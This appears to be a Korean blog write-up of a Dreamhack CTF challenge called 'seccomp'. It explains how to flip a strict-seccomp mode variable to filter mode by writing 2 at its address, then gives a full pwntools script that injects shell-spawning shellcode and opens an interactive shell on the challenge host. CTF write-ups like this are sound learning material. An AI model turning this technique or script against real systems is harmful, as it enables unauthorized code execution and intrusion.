seccomp

🌇│System_Study/📕│Dreamhack_Hacking

seccomp

Jastes 2022. 11. 6. 23:50

seccomp

문제 풀이

보호기법은 준수할 정도로 NX와 Canary.., Partial RELRO가 있는 모습
ASLR은 당연히 기본으로 되어 있겠네요.. ㅠ 전이랑 보호기법이 넘 ㅠ

이번엔 filter_list가 아닌 strict모드라서 read, write,exit..정도의 시스템 콜만 가능합니다.

아키텍처가 64니까 콜번호가 초과하지 않으면 호출이니까..
0x400..을 맞추고 seccomp을 우회하는 건 잘 안될 듯 싶네요

그래서 방법을 찾던 도중 SECCOMP_MODE_STRICT에 집중
구글링한결과

Linux seccomp

Linux의 Process Sandboxing 기법인 seccomp을 분석한다.

ssup2.github.io

seccomp(2) - Linux manual page

seccomp(2) — Linux manual page SECCOMP(2) Linux Programmer's Manual SECCOMP(2) NAME top seccomp - operate on Secure Computing state of the process SYNOPSIS top #include /* Definition of SECCOMP_* constants */ #include /* Definitio

man7.org

여기 문서에서 확인 할 수 있드시 mode 변수에서 FILTER MODE로 바꿔버리면
필터링 하는 syscall이 없어서 아무 syscall이나 호출할 가능성이 있습니다

그래서 filter mode의 콜번호는 위 링크에서 2번째라고 말하는 듯 싶기에 2번이며,
다음으로 mode의 변수 주소를 확인하면..

0x602090입니다. 해서 익스 코드를 작성해보면..

Exploit 설계

여기서 1번은 쉘코드 넣으면 되고 2번은 실행 3번이 우리가 구한 정보를 넣으면 되겠군요

filter모드로 전환하는 과정이니까요 음.. 나머지 부분은 앞에서 말한 내용이니까 어렵지 않죠?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23 from pwn import *
 
#context.log_level = 'debug'
 
context(arch='x86_64')
p = remote("host3.dreamhack.games", 23877)
#p = process("./seccomp")
 
mode = 0x602090
shellcode = asm(shellcraft.sh())
 
p.sendlineafter("> ", "3")
p.sendlineafter("addr: ", str(mode))
p.sendlineafter("value: ", "2")
 
 
p.sendlineafter("> ", "1")
p.sendafter("shellcode: ", shellcode)
 
p.sendlineafter("> ", "2")
 
p.interactive()
 
Colored by Color Scripter cs

참고 자료

참고 이미지

저작자표시 비영리 변경금지